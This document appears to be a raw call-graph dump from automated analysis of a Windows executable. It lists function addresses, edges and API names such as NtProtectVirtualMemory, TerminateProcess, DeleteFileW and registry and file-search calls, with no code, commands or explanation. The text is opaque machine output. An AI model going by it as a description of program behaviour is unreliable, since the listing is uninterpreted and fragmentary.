fd4db2 102553 fe2b5c 26 API calls ___std_exception_copy 102548->102553 102550 fd4dbd 102550->102521 102551->102521 102552->102548 102553->102550 102554->102547 102555->102515 102569 101e80e 102556->102569 102558 101ddd4 Process32NextW 102559 101de86 CloseHandle 102558->102559 102565 101ddcd 102558->102565 102559->102320 102560 fbbf73 8 API calls 102560->102565 102561 fbb329 8 API calls 102561->102565 102565->102558 102565->102559 102565->102560 102565->102561 102575 fb568e 102565->102575 102617 fb7bb5 102565->102617 102626 fce36b 41 API calls 102565->102626 102566->102329 102567->102331 102568->102337 102570 101e819 102569->102570 102571 101e830 102570->102571 102574 101e836 102570->102574 102627 fd6722 GetStringTypeW _strftime 102570->102627 102628 fd666b 39 API calls _strftime 102571->102628 102574->102565 102629 fbbf73 102575->102629 102578 fbbf73 8 API calls 102579 fb56ac 102578->102579 102580 fbbf73 8 API calls 102579->102580 102581 fb56b4 102580->102581 102582 fbbf73 8 API calls 102581->102582 102583 fb56bc 102582->102583 102584 fb56f0 102583->102584 102585 ff4da1 102583->102585 102587 fbacc0 8 API calls 102584->102587 102586 fbbed9 8 API calls 102585->102586 102588 ff4daa 102586->102588 102589 fb56fe 102587->102589 102590 fbbd57 8 API calls 102588->102590 102646 fbadf4 102589->102646 102593 fb5733 102590->102593 102592 fb5708 102592->102593 102594 fbacc0 8 API calls 102592->102594 102595 fb5754 102593->102595 102609 fb5778 102593->102609 102616 ff4dcc 102593->102616 102597 fb5729 102594->102597 102595->102609 102650 fb655e 102595->102650 102599 fbadf4 8 API calls 102597->102599 102598 fb5789 102600 fb579f 102598->102600 102604 fbbed9 8 API calls 102598->102604 102599->102593 102605 fbbed9 8 API calls 102600->102605 102607 fb57b3 102600->102607 102604->102600 102605->102607 102606 fb57be 102611 fbbed9 8 API calls 102606->102611 102614 fb57c9 102606->102614 102607->102606 102610 fbbed9 8 API calls 102607->102610 102608 fbacc0 8 API calls 102608->102609 102634 fbacc0 102609->102634 102610->102606 102611->102614 102612 fb655e 8 API calls 102613 ff4e8c 102612->102613 102613->102609 102613->102612 102665 fbad40 8 API calls __fread_nolock 102613->102665 102614->102565 102653 fb8577 102616->102653 102618 ff641d 102617->102618 102619 fb7bc7 102617->102619 102684 10113c8 8 API calls __fread_nolock 102618->102684 102674 fb7bd8 102619->102674 102622 fb7bd3 102622->102565 102623 ff6427 102624 ff6433 102623->102624 102625 fbbed9 8 API calls 102623->102625 102625->102624 102626->102565 102627->102570 102628->102574 102630 fd017b 8 API calls 102629->102630 102631 fbbf88 102630->102631 102632 fd014b 8 API calls 102631->102632 102633 fb56a4 102632->102633 102633->102578 102637 fbace1 102634->102637 102645 fbaccf 102634->102645 102635 fbacda __fread_nolock 102635->102598 102639 1000557 102637->102639 102640 fbad07 102637->102640 102637->102645 102638 10005a3 __fread_nolock 102642 fd014b 8 API calls 102639->102642 102666 fb88e8 8 API calls 102640->102666 102643 1000561 102642->102643 102644 fd017b 8 API calls 102643->102644 102644->102645 102645->102635 102667 fbc2c9 102645->102667 102647 fbae02 102646->102647 102649 fbae0b __fread_nolock 102646->102649 102648 fbc2c9 8 API calls 102647->102648 102647->102649 102648->102649 102649->102592 102651 fbc2c9 8 API calls 102650->102651 102652 fb5761 102651->102652 102652->102608 102652->102609 102654 fb8587 _wcslen 102653->102654 102655 ff6610 102653->102655 102658 fb859d 102654->102658 102659 fb85c2 102654->102659 102656 fbadf4 8 API calls 102655->102656 102657 ff6619 102656->102657 102657->102657 102673 fb88e8 8 API calls 102658->102673 102660 fd014b 8 API calls 102659->102660 102662 fb85ce 102660->102662 102663 fd017b 8 API calls 102662->102663 102664 fb85a5 __fread_nolock 102663->102664 102664->102613 102665->102613 102666->102635 102668 fbc2d9 __fread_nolock 102667->102668 102669 fbc2dc 102667->102669 102668->102638 102670 fd014b 8 API calls 102669->102670 102671 fbc2e7 102670->102671 102672 fd017b 8 API calls 102671->102672 102672->102668 102673->102664 102676 fb7be7 102674->102676 102681 fb7c1b __fread_nolock 102674->102681 102675 ff644e 102678 fd014b 8 API calls 102675->102678 102676->102675 102677 fb7c0e 102676->102677 102676->102681 102685 fb7d74 102677->102685 102680 ff645d 102678->102680 102682 fd017b 8 API calls 102680->102682 102681->102622 102683 ff6491 __fread_nolock 102682->102683 102684->102623 102686 fb7d8a 102685->102686 102689 fb7d85 __fread_nolock 102685->102689 102687 fd017b 8 API calls 102686->102687 102688 ff6528 102686->102688 102687->102689 102689->102681 102691 fd017b 8 API calls 102690->102691 102692 fcc209 102691->102692 102693 fd014b 8 API calls 102692->102693 102694 fcc215 102693->102694 102694->102346 102696 fcf9fe 102695->102696 102697 fcfa35 102695->102697 102699 fd017b 8 API calls 102696->102699 102707 fcfe8a 8 API calls 102697->102707 102701 fcfa05 WideCharToMultiByte 102699->102701 102700 fcfa29 102700->102351 102706 fcfa3e 8 API calls __fread_nolock 102701->102706 102704 fd014b 8 API calls 102703->102704 102705 fb424e 102704->102705 102705->102358 102705->102359 102706->102700 102707->102700 102708->102371 102710 fb8ec0 52 API calls 102709->102710 102711 10389ed 102710->102711 102734 1038a32 messages 102711->102734 102747 1039730 102711->102747 102713 1038cde 102714 1038eac 102713->102714 102719 1038cec 102713->102719 102797 1039941 59 API calls 102714->102797 102717 1038ebb 102718 1038ec7 102717->102718 102717->102719 102718->102734 102760 10388e3 102719->102760 102720 fb8ec0 52 API calls 102738 1038aa6 102720->102738 102725 1038d25 102774 fcffe0 102725->102774 102728 1038d45 102781 1023fe1 81 API calls __wsopen_s 102728->102781 102729 1038d5f 102782 fb7e12 102729->102782 102732 1038d50 GetCurrentProcess TerminateProcess 102732->102729 102734->102374 102738->102713 102738->102720 102738->102734 102779 1014ad3 8 API calls __fread_nolock 102738->102779 102780 1038f7a 41 API calls _strftime 102738->102780 102739 1038f22 102739->102734 102743 1038f36 FreeLibrary 102739->102743 102740 1038d9e 102794 10395d8 74 API calls 102740->102794 102743->102734 102745 1038daf 102745->102739 102795 fc1ca0 8 API calls 102745->102795 102796 fbb4c8 8 API calls 102745->102796 102798 10395d8 74 API calls 102745->102798 102748 fbc2c9 8 API calls 102747->102748 102749 103974b CharLowerBuffW 102748->102749 102799 1019805 102749->102799 102753 fbbf73 8 API calls 102754 1039787 102753->102754 102755 fbacc0 8 API calls 102754->102755 102756 103979b 102755->102756 102757 fbadf4 8 API calls 102756->102757 102759 10397a5 _wcslen 102757->102759 102758 10398bb _wcslen 102758->102738 102759->102758 102806 1038f7a 41 API calls _strftime 102759->102806 102761 1038949 102760->102761 102762 10388fe 102760->102762 102766 1039af3 102761->102766 102763 fd017b 8 API calls 102762->102763 102764 1038920 102763->102764 102764->102761 102765 fd014b 8 API calls 102764->102765 102765->102764 102767 1039d08 messages 102766->102767 102772 1039b17 _strcat _wcslen ___std_exception_copy 102766->102772 102767->102725 102768 fbca5b 39 API calls 102768->102772 102769 fbc98d 39 API calls 102769->102772 102770 fbc63f 39 API calls 102770->102772 102771 fb8ec0 52 API calls 102771->102772 102772->102767 102772->102768 102772->102769 102772->102770 102772->102771 102809 101f8c5 10 API calls _wcslen 102772->102809 102777 fcfff5 102774->102777 102775 fd008d NtProtectVirtualMemory 102776 fd005b 102775->102776 102776->102728 102776->102729 102777->102775 102777->102776 102778 fd007b CloseHandle 102777->102778 102778->102776 102779->102738 102780->102738 102781->102732 102783 fb7e1a 102782->102783 102784 fd014b 8 API calls 102783->102784 102785 fb7e28 102784->102785 102810 fb8445 102785->102810 102788 fb8470 102813 fbc760 102788->102813 102790 fb8480 102791 fd017b 8 API calls 102790->102791 102792 fb851c 102790->102792 102791->102792 102792->102745 102793 fc1ca0 8 API calls 102792->102793 102793->102740 102794->102745 102795->102745 102796->102745 102797->102717 102798->102745 102800 1019825 _wcslen 102799->102800 102801 1019914 102800->102801 102804 101985a 102800->102804 102805 1019919 102800->102805 102801->102753 102801->102759 102804->102801 102807 fce36b 41 API calls 102804->102807 102805->102801 102808 fce36b 41 API calls 102805->102808 102806->102758 102807->102804 102808->102805 102809->102772 102811 fd014b 8 API calls 102810->102811 102812 fb7e30 102811->102812 102812->102788 102814 fbc76b 102813->102814 102815 1001285 102814->102815 102820 fbc773 messages 102814->102820 102816 fd014b 8 API calls 102815->102816 102817 1001291 102816->102817 102818 fbc77a 102818->102790 102820->102818 102821 fbc7e0 8 API calls messages 102820->102821 102821->102820 102823 fbbf73 8 API calls 102822->102823 102824 101dc73 102823->102824 102825 fbbf73 8 API calls 102824->102825 102826 101dc7c 102825->102826 102827 fbbf73 8 API calls 102826->102827 102828 101dc85 102827->102828 102846 fb5851 102828->102846 102833 101dcab 102835 fb568e 8 API calls 102833->102835 102834 fb6b7c 8 API calls 102834->102833 102836 101dcbf FindFirstFileW 102835->102836 102837 101dd4b FindClose 102836->102837 102839 101dcde 102836->102839 102842 101dd56 102837->102842 102838 101dd26 FindNextFileW 102838->102839 102839->102837 102839->102838 102840 fbbed9 8 API calls 102839->102840 102841 fb7bb5 8 API calls 102839->102841 102858 fb6b7c 102839->102858 102840->102839 102841->102839 102842->102388 102845 101dd42 FindClose 102845->102842 102867 ff22d0 102846->102867 102849 fb5898 102852 fbbd57 8 API calls 102849->102852 102850 fb587d 102851 fb8577 8 API calls 102850->102851 102853 fb5889 102851->102853 102852->102853 102869 fb55dc 102853->102869 102856 101eab0 GetFileAttributesW 102857 101dc99 102856->102857 102857->102833 102857->102834 102859 ff57fe 102858->102859 102860 fb6b93 102858->102860 102862 fd014b 8 API calls 102859->102862 102873 fb6ba4 102860->102873 102864 ff5808 _wcslen 102862->102864 102863 fb6b9e DeleteFileW 102863->102838 102863->102845 102865 fd017b 8 API calls 102864->102865 102866 ff5841 __fread_nolock 102865->102866 102868 fb585e GetFullPathNameW 102867->102868 102868->102849 102868->102850 102870 fb55ea 102869->102870 102871 fbadf4 8 API calls 102870->102871 102872 fb55fe 102871->102872 102872->102856 102874 fb6bb4 _wcslen 102873->102874 102875 fb6bc7 102874->102875 102876 ff5860 102874->102876 102877 fb7d74 8 API calls 102875->102877 102878 fd014b 8 API calls 102876->102878 102879 fb6bd4 __fread_nolock 102877->102879 102880 ff586a 102878->102880 102879->102863 102881 fd017b 8 API calls 102880->102881 102882 ff589a __fread_nolock 102881->102882 102884 10218b6 102883->102884 102885 fd014b 8 API calls 102884->102885 102886 10218bd 102885->102886 102889 101fcb5 102886->102889 102888 10218f7 102888->102408 102890 fbc2c9 8 API calls 102889->102890 102891 101fcc8 CharLowerBuffW 102890->102891 102893 101fcdb 102891->102893 102892 fb655e 8 API calls 102892->102893 102893->102892 102894 101fce5 ___scrt_fastfail 102893->102894 102895 101fd19 102893->102895 102894->102888 102896 fb655e 8 API calls 102895->102896 102898 101fd2b 102895->102898 102896->102898 102897 fd017b 8 API calls 102902 101fd59 102897->102902 102898->102897 102901 101fdb8 102901->102894 102904 fd014b 8 API calls 102901->102904 102903 101fd7b 102902->102903 102922 101fbed 8 API calls 102902->102922 102907 101fe0c 102903->102907 102905 101fdd2 102904->102905 102906 fd017b 8 API calls 102905->102906 102906->102894 102908 fbbf73 8 API calls 102907->102908 102909 101fe3e 102908->102909 102910 fbbf73 8 API calls 102909->102910 102911 101fe47 102910->102911 102912 fbbf73 8 API calls 102911->102912 102917 101fe50 102912->102917 102913 1020114 102913->102901 102914 fbad40 8 API calls 102914->102917 102915 fb8577 8 API calls 102915->102917 102916 fd66f8 GetStringTypeW 102916->102917 102917->102913 102917->102914 102917->102915 102917->102916 102919 fd6641 39 API calls 102917->102919 102920 101fe0c 40 API calls 102917->102920 102921 fbbed9 8 API calls 102917->102921 102923 fd6722 GetStringTypeW _strftime 102917->102923 102919->102917 102920->102917 102921->102917 102922->102902 102923->102917 102925 fd014b 8 API calls 102924->102925 102926 fcbc65 102925->102926 102927 fbb329 8 API calls 102926->102927 102928 fcbc70 102927->102928 102928->102413 102930 fb3996 ___scrt_fastfail 102929->102930 102950 fb5f32 102930->102950 102934 fb3a3a Shell_NotifyIconW 102954 fb61a9 102934->102954 102935 ff40cd Shell_NotifyIconW 102936 fb3a1c 102936->102934 102936->102935 102938 fb3a50 102938->102416 102940 fb3969 102939->102940 102941 fb3919 ___scrt_fastfail 102939->102941 102940->102416 102942 fb3938 Shell_NotifyIconW 102941->102942 102942->102940 102944 fd017b 8 API calls 102943->102944 102945 fb7afa 102944->102945 102946 fd014b 8 API calls 102945->102946 102947 fb7b08 102946->102947 102947->102416 102948->102416 102949->102416 102951 fb5f4e 102950->102951 102952 fb39eb 102950->102952 102951->102952 102953 ff5070 DestroyIcon 102951->102953 102952->102936 102984 101d11f 42 API calls _strftime 102952->102984 102953->102952 102955 fb62a8 102954->102955 102956 fb61c6 102954->102956 102955->102938 102957 fb7ad5 8 API calls 102956->102957 102958 fb61d4 102957->102958 102959 ff5278 LoadStringW 102958->102959 102960 fb61e1 102958->102960 102963 ff5292 102959->102963 102961 fb8577 8 API calls 102960->102961 102962 fb61f6 102961->102962 102964 fb6203 102962->102964 102971 ff52ae 102962->102971 102966 fbbed9 8 API calls 102963->102966 102970 fb6229 ___scrt_fastfail 102963->102970 102964->102963 102965 fb620d 102964->102965 102967 fb6b7c 8 API calls 102965->102967 102966->102970 102968 fb621b 102967->102968 102969 fb7bb5 8 API calls 102968->102969 102969->102970 102972 fb628e Shell_NotifyIconW 102970->102972 102971->102970 102973 fbbf73 8 API calls 102971->102973 102982 ff52f1 102971->102982 102972->102955 102974 ff52d8 102973->102974 102985 101a350 9 API calls 102974->102985 102977 ff5310 102979 fb6b7c 8 API calls 102977->102979 102978 ff52e3 102980 fb7bb5 8 API calls 102978->102980 102981 ff5321 102979->102981 102980->102982 102983 fb6b7c 8 API calls 102981->102983 102986 fcfe6f 51 API calls 102982->102986 102983->102970 102984->102936 102985->102978 102986->102977 102987->102463 102988->102444 102989->102463 102990->102459 102991->102463 102992->102169 102993->102171 102994->102175 104736 fb1098 104741 fb5fc8 104736->104741 104740 fb10a7 104742 fbbf73 8 API calls 104741->104742 104743 fb5fdf GetVersionExW 104742->104743 104744 fb8577 8 API calls 104743->104744 104745 fb602c 104744->104745 104746 fbadf4 8 API calls 104745->104746 104748 fb6062 104745->104748 104747 fb6056 104746->104747 104750 fb55dc 8 API calls 104747->104750 104749 fb611c GetCurrentProcess IsWow64Process 104748->104749 104756 ff5224 104748->104756 104751 fb6138 104749->104751 104750->104748 104752 ff5269 GetSystemInfo 104751->104752 104753 fb6150 LoadLibraryA 104751->104753 104754 fb619d GetSystemInfo 104753->104754 104755 fb6161 GetProcAddress 104753->104755 104758 fb6177 104754->104758 104755->104754 104757 fb6171 GetNativeSystemInfo 104755->104757 104757->104758 104759 fb617b FreeLibrary 104758->104759 104760 fb109d 104758->104760 104759->104760 104761 fd0413 29 API calls __onexit 104760->104761 104761->104740 102995 fe947a 102996 fe9487 102995->102996 102999 fe949f 102995->102999 103052 fdf649 20 API calls __dosmaperr 102996->103052 102998 fe948c 103053 fe2b5c 26 API calls ___std_exception_copy 102998->103053 103001 fe94fa 102999->103001 103009 fe9497 102999->103009 103054 ff0144 21 API calls 2 library calls 102999->103054 103015 fddcc5 103001->103015 103004 fe9512 103022 fe8fb2 103004->103022 103006 fe9519 103007 fddcc5 __fread_nolock 26 API calls 103006->103007 103006->103009 103008 fe9545 103007->103008 103008->103009 103010 fddcc5 __fread_nolock 26 API calls 103008->103010 103011 fe9553 103010->103011 103011->103009 103012 fddcc5 __fread_nolock 26 API calls 103011->103012 103013 fe9563 103012->103013 103014 fddcc5 __fread_nolock 26 API calls 103013->103014 103014->103009 103016 fddce6 103015->103016 103017 fddcd1 103015->103017 103016->103004 103055 fdf649 20 API calls __dosmaperr 103017->103055 103019 fddcd6 103056 fe2b5c 26 API calls ___std_exception_copy 103019->103056 103021 fddce1 103021->103004 103023 fe8fbe __FrameHandler3::FrameUnwindToState 103022->103023 103024 fe8fde 103023->103024 103025 fe8fc6 103023->103025 103026 fe90a4 103024->103026 103031 fe9017 103024->103031 103123 fdf636 20 API calls __dosmaperr 103025->103123 103130 fdf636 20 API calls __dosmaperr 103026->103130 103029 fe8fcb 103124 fdf649 20 API calls __dosmaperr 103029->103124 103033 fe903b 103031->103033 103034 fe9026 103031->103034 103032 fe90a9 103131 fdf649 20 API calls __dosmaperr 103032->103131 103057 fe54ba EnterCriticalSection 103033->103057 103125 fdf636 20 API calls __dosmaperr 103034->103125 103038 fe9033 103132 fe2b5c 26 API calls ___std_exception_copy 103038->103132 103039 fe902b 103126 fdf649 20 API calls __dosmaperr 103039->103126 103040 fe9041 103043 fe905d 103040->103043 103044 fe9072 103040->103044 103041 fe8fd3 __fread_nolock 103041->103006 103127 fdf649 20 API calls __dosmaperr 103043->103127 103058 fe90c5 103044->103058 103048 fe9062 103128 fdf636 20 API calls __dosmaperr 103048->103128 103049 fe906d 103129 fe909c LeaveCriticalSection __wsopen_s 103049->103129 103052->102998 103053->103009 103054->103001 103055->103019 103056->103021 103057->103040 103059 fe90ef 103058->103059 103060 fe90d7 103058->103060 103062 fe9459 103059->103062 103067 fe9134 103059->103067 103149 fdf636 20 API calls __dosmaperr 103060->103149 103172 fdf636 20 API calls __dosmaperr 103062->103172 103063 fe90dc 103150 fdf649 20 API calls __dosmaperr 103063->103150 103066 fe945e 103173 fdf649 20 API calls __dosmaperr 103066->103173 103069 fe913f 103067->103069 103070 fe90e4 103067->103070 103074 fe916f 103067->103074 103151 fdf636 20 API calls __dosmaperr 103069->103151 103070->103049 103071 fe914c 103174 fe2b5c 26 API calls ___std_exception_copy 103071->103174 103073 fe9144 103152 fdf649 20 API calls __dosmaperr 103073->103152 103077 fe9188 103074->103077 103078 fe91ae 103074->103078 103079 fe91ca 103074->103079 103077->103078 103083 fe9195 103077->103083 103153 fdf636 20 API calls __dosmaperr 103078->103153 103133 fe3b93 103079->103133 103082 fe91b3 103154 fdf649 20 API calls __dosmaperr 103082->103154 103140 fefc1b 103083->103140 103088 fe9333 103091 fe93a9 103088->103091 103095 fe934c GetConsoleMode 103088->103095 103089 fe91ba 103155 fe2b5c 26 API calls ___std_exception_copy 103089->103155 103090 fe91ea 103093 fe2d38 _free 20 API calls 103090->103093 103094 fe93ad ReadFile 103091->103094 103096 fe91f1 103093->103096 103097 fe93c7 103094->103097 103098 fe9421 GetLastError 103094->103098 103095->103091 103099 fe935d 103095->103099 103100 fe91fb 103096->103100 103101 fe9216 103096->103101 103097->103098 103104 fe939e 103097->103104 103102 fe942e 103098->103102 103103 fe9385 103098->103103 103099->103094 103105 fe9363 ReadConsoleW 103099->103105 103162 fdf649 20 API calls __dosmaperr 103100->103162 103164 fe97a4 103101->103164 103170 fdf649 20 API calls __dosmaperr 103102->103170 103120 fe91c5 __fread_nolock 103103->103120 103167 fdf613 20 API calls 2 library calls 103103->103167 103116 fe93ec 103104->103116 103117 fe9403 103104->103117 103104->103120 103105->103104 103106 fe937f GetLastError 103105->103106 103106->103103 103107 fe2d38 _free 20 API calls 103107->103070 103112 fe9200 103163 fdf636 20 API calls __dosmaperr 103112->103163 103113 fe9433 103171 fdf636 20 API calls __dosmaperr 103113->103171 103168 fe8de1 31 API calls 4 library calls 103116->103168 103119 fe941a 103117->103119 103117->103120 103169 fe8c21 29 API calls __wsopen_s 103119->103169 103120->103107 103122 fe941f 103122->103120 103123->103029 103124->103041 103125->103039 103126->103038 103127->103048 103128->103049 103129->103041 103130->103032 103131->103038 103132->103041 103134 fe3bd1 103133->103134 103138 fe3ba1 pre_c_initialization 103133->103138 103176 fdf649 20 API calls __dosmaperr 103134->103176 103136 fe3bbc RtlAllocateHeap 103137 fe3bcf 103136->103137 103136->103138 103156 fe2d38 103137->103156 103138->103134 103138->103136 103175 fd521d 7 API calls 2 library calls 103138->103175 103141 fefc28 103140->103141 103142 fefc35 103140->103142 103177 fdf649 20 API calls __dosmaperr 103141->103177 103145 fefc41 103142->103145 103178 fdf649 20 API calls __dosmaperr 103142->103178 103145->103088 103146 fefc62 103179 fe2b5c 26 API calls ___std_exception_copy 103146->103179 103147 fefc2d 103147->103088 103149->103063 103150->103070 103151->103073 103152->103071 103153->103082 103154->103089 103155->103120 103157 fe2d43 RtlFreeHeap 103156->103157 103161 fe2d6c _free 103156->103161 103158 fe2d58 103157->103158 103157->103161 103180 fdf649 20 API calls __dosmaperr 103158->103180 103160 fe2d5e GetLastError 103160->103161 103161->103090 103162->103112 103163->103120 103181 fe970b 103164->103181 103167->103120 103168->103120 103169->103122 103170->103113 103171->103120 103172->103066 103173->103071 103174->103070 103175->103138 103176->103137 103177->103147 103178->103146 103179->103147 103180->103160 103190 fe5737 103181->103190 103183 fe971d 103184 fe9736 SetFilePointerEx 103183->103184 103185 fe9725 103183->103185 103187 fe974e GetLastError 103184->103187 103188 fe972a 103184->103188 103203 fdf649 20 API calls __dosmaperr 103185->103203 103204 fdf613 20 API calls 2 library calls 103187->103204 103188->103083 103191 fe5759 103190->103191 103192 fe5744 103190->103192 103196 fe577e 103191->103196 103207 fdf636 20 API calls __dosmaperr 103191->103207 103205 fdf636 20 API calls __dosmaperr 103192->103205 103195 fe5749 103206 fdf649 20 API calls __dosmaperr 103195->103206 103196->103183 103197 fe5789 103208 fdf649 20 API calls __dosmaperr 103197->103208 103200 fe5751 103200->103183 103201 fe5791 103209 fe2b5c 26 API calls ___std_exception_copy 103201->103209 103203->103188 103204->103188 103205->103195 103206->103200 103207->103197 103208->103201 103209->103200 103210 1001ac5 103211 1001acd 103210->103211 103214 fbd535 103210->103214 103256 1017a87 8 API calls __fread_nolock 103211->103256 103213 1001adf 103257 1017a00 8 API calls __fread_nolock 103213->103257 103216 fd014b 8 API calls 103214->103216 103218 fbd589 103216->103218 103217 1001b09 103219 fc0340 224 API calls 103217->103219 103240 fbc32d 103218->103240 103220 1001b30 103219->103220 103222 1001b44 103220->103222 103258 10361a2 53 API calls _wcslen 103220->103258 103225 fd014b 8 API calls 103228 fbd66e messages 103225->103228 103226 1001b61 103226->103214 103259 1017a87 8 API calls __fread_nolock 103226->103259 103230 fbbed9 8 API calls 103228->103230 103235 1001f79 103228->103235 103237 1001f94 103228->103237 103239 fbd911 messages 103228->103239 103247 fbc3ab 103228->103247 103260 fbb4c8 8 API calls 103228->103260 103229 fbc3ab 8 API calls 103232 fbd9ac messages 103229->103232 103230->103228 103234 fbd9c3 103232->103234 103255 fce30a 8 API calls messages 103232->103255 103261 10156ae 8 API calls messages 103235->103261 103239->103229 103239->103232 103243 fbc33d 103240->103243 103241 fbc345 103241->103225 103242 fd014b 8 API calls 103242->103243 103243->103241 103243->103242 103244 fbbf73 8 API calls 103243->103244 103245 fbbed9 8 API calls 103243->103245 103246 fbc32d 8 API calls 103243->103246 103244->103243 103245->103243 103246->103243 103248 fbc3b9 103247->103248 103254 fbc3e1 messages 103247->103254 103249 fbc3c7 103248->103249 103250 fbc3ab 8 API calls 103248->103250 103251 fbc3cd 103249->103251 103252 fbc3ab 8 API calls 103249->103252 103250->103249 103251->103254 103262 fbc7e0 8 API calls messages 103251->103262 103252->103251 103254->103228 103255->103232 103256->103213 103257->103217 103258->103226 103259->103226 103260->103228 103261->103237 103262->103254 103263 fbdd3d 103264 10019c2 103263->103264 103265 fbdd63 103263->103265 103267 1001a82 103264->103267 103271 1001a26 103264->103271 103274 1001a46 103264->103274 103268 fd014b 8 API calls 103265->103268 103286 fbdead 103265->103286 103308 1023fe1 81 API calls __wsopen_s 103267->103308 103273 fbdd8d 103268->103273 103269 fd017b 8 API calls 103280 fbdee4 __fread_nolock 103269->103280 103306 fce6e8 224 API calls 103271->103306 103275 fd014b 8 API calls 103273->103275 103273->103280 103285 1001a7d 103274->103285 103307 1023fe1 81 API calls __wsopen_s 103274->103307 103276 fbdddb 103275->103276 103276->103271 103278 fbde16 103276->103278 103277 fd017b 8 API calls 103277->103280 103279 fc0340 224 API calls 103278->103279 103281 fbde29 103279->103281 103280->103274 103280->103277 103281->103280 103282 1001aa5 103281->103282 103283 fbde77 103281->103283 103281->103285 103287 fbd526 103281->103287 103309 1023fe1 81 API calls __wsopen_s 103282->103309 103283->103286 103283->103287 103286->103269 103288 fd014b 8 API calls 103287->103288 103289 fbd589 103288->103289 103290 fbc32d 8 API calls 103289->103290 103291 fbd5b3 103290->103291 103292 fd014b 8 API calls 103291->103292 103297 fbd66e messages 103292->103297 103293 fbc3ab 8 API calls 103303 fbd9ac messages 103293->103303 103294 fbbed9 8 API calls 103294->103297 103297->103294 103298 1001f79 103297->103298 103299 1001f94 103297->103299 103301 fbc3ab 8 API calls 103297->103301 103302 fbd911 messages 103297->103302 103310 fbb4c8 8 API calls 103297->103310 103311 10156ae 8 API calls messages 103298->103311 103301->103297 103302->103293 103302->103303 103304 fbd9c3 103303->103304 103305 fce30a 8 API calls messages 103303->103305 103305->103303 103306->103274 103307->103285 103308->103285 103309->103285 103310->103297 103311->103299 104762 fbf4dc 104763 fbcab0 224 API calls 104762->104763 104764 fbf4ea 104763->104764 103312 fb1033 103317 fb68b4 103312->103317 103316 fb1042 103318 fbbf73 8 API calls 103317->103318 103319 fb6922 103318->103319 103325 fb589f 103319->103325 103322 fb69bf 103323 fb1038 103322->103323 103328 fb6b14 8 API calls __fread_nolock 103322->103328 103324 fd0413 29 API calls __onexit 103323->103324 103324->103316 103329 fb58cb 103325->103329 103328->103322 103330 fb58be 103329->103330 103331 fb58d8 103329->103331 103330->103322 103331->103330 103332 fb58df RegOpenKeyExW 103331->103332 103332->103330 103333 fb58f9 RegQueryValueExW 103332->103333 103334 fb591a 103333->103334 103335 fb592f RegCloseKey 103333->103335 103334->103335 103335->103330 103336 10017c8 103337 10017df 103336->103337 103339 fbd2a0 103337->103339 103340 1023fe1 81 API calls __wsopen_s 103337->103340 103340->103339 103341 fb36f5 103344 fb370f 103341->103344 103345 fb3726 103344->103345 103346 fb372b 103345->103346 103347 fb378a 103345->103347 103384 fb3788 103345->103384 103351 fb3738 103346->103351 103352 fb3804 PostQuitMessage 103346->103352 103349 ff3df4 103347->103349 103350 fb3790 103347->103350 103348 fb376f DefWindowProcW 103353 fb3709 103348->103353 103399 fb2f92 10 API calls 103349->103399 103354 fb37bc SetTimer RegisterWindowMessageW 103350->103354 103355 fb3797 103350->103355 103356 fb3743 103351->103356 103357 ff3e61 103351->103357 103352->103353 103354->103353 103361 fb37e5 CreatePopupMenu 103354->103361 103359 ff3d95 103355->103359 103360 fb37a0 KillTimer 103355->103360 103362 fb380e 103356->103362 103363 fb374d 103356->103363 103402 101c8f7 65 API calls ___scrt_fastfail 103357->103402 103367 ff3d9a 103359->103367 103368 ff3dd0 MoveWindow 103359->103368 103369 fb3907 Shell_NotifyIconW 103360->103369 103361->103353 103389 fcfcad 103362->103389 103370 fb3758 103363->103370 103371 ff3e46 103363->103371 103365 ff3e15 103400 fcf23c 40 API calls 103365->103400 103375 ff3dbf SetFocus 103367->103375 103376 ff3da0 103367->103376 103368->103353 103377 fb37b3 103369->103377 103374 fb3763 103370->103374 103378 fb37f2 103370->103378 103371->103348 103401 1011423 8 API calls 103371->103401 103372 ff3e73 103372->103348 103372->103353 103374->103348 103386 fb3907 Shell_NotifyIconW 103374->103386 103375->103353 103376->103374 103379 ff3da9 103376->103379 103396 fb59ff DeleteObject DestroyWindow 103377->103396 103397 fb381f 75 API calls ___scrt_fastfail 103378->103397 103398 fb2f92 10 API calls 103379->103398 103384->103348 103385 fb3802 103385->103353 103387 ff3e3a 103386->103387 103388 fb396b 60 API calls 103387->103388 103388->103384 103390 fcfd4b 103389->103390 103391 fcfcc5 ___scrt_fastfail 103389->103391 103390->103353 103392 fb61a9 55 API calls 103391->103392 103393 fcfcec 103392->103393 103394 fcfd34 KillTimer SetTimer 103393->103394 103395 100fe2b Shell_NotifyIconW 103393->103395 103394->103390 103395->103394 103396->103353 103397->103385 103398->103353 103399->103365 103400->103374 103401->103384 103402->103372 103403 100400f 103419 fbeeb0 messages 103403->103419 103404 fbf211 PeekMessageW 103404->103419 103405 fbef07 GetInputState 103405->103404 103405->103419 103406 10032cd TranslateAcceleratorW 103406->103419 103408 fbf28f PeekMessageW 103408->103419 103409 fbf104 timeGetTime 103409->103419 103410 fbf273 TranslateMessage DispatchMessageW 103410->103408 103411 fbf2af Sleep 103411->103419 103412 1004183 Sleep 103426 1004060 103412->103426 103414 10033e9 timeGetTime 103471 fcaa65 9 API calls 103414->103471 103416 101dd87 46 API calls 103416->103426 103418 100421a GetExitCodeProcess 103421 1004230 WaitForSingleObject 103418->103421 103422 1004246 CloseHandle 103418->103422 103419->103404 103419->103405 103419->103406 103419->103408 103419->103409 103419->103410 103419->103411 103419->103412 103419->103414 103425 fbf0d5 103419->103425 103419->103426 103432 fc0340 224 API calls 103419->103432 103433 fc2b20 224 API calls 103419->103433 103435 fbf450 103419->103435 103442 fbf6d0 103419->103442 103465 fce915 103419->103465 103470 fcf215 timeGetTime 103419->103470 103472 102446f 8 API calls 103419->103472 103473 1023fe1 81 API calls __wsopen_s 103419->103473 103420 104345b GetForegroundWindow 103420->103426 103421->103419 103421->103422 103422->103426 103424 1003d51 103424->103425 103426->103416 103426->103418 103426->103419 103426->103420 103426->103424 103427 10042b8 Sleep 103426->103427 103474 10360b5 8 API calls 103426->103474 103475 101f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103426->103475 103476 fcf215 timeGetTime 103426->103476 103427->103419 103432->103419 103433->103419 103436 fbf46f 103435->103436 103437 fbf483 103435->103437 103477 fbe960 103436->103477 103509 1023fe1 81 API calls __wsopen_s 103437->103509 103439 fbf47a 103439->103419 103441 1004584 103441->103441 103443 fbf707 103442->103443 103458 fbf7dc messages 103443->103458 103530 fd05b2 5 API calls __Init_thread_wait 103443->103530 103446 10045d9 103448 fbbf73 8 API calls 103446->103448 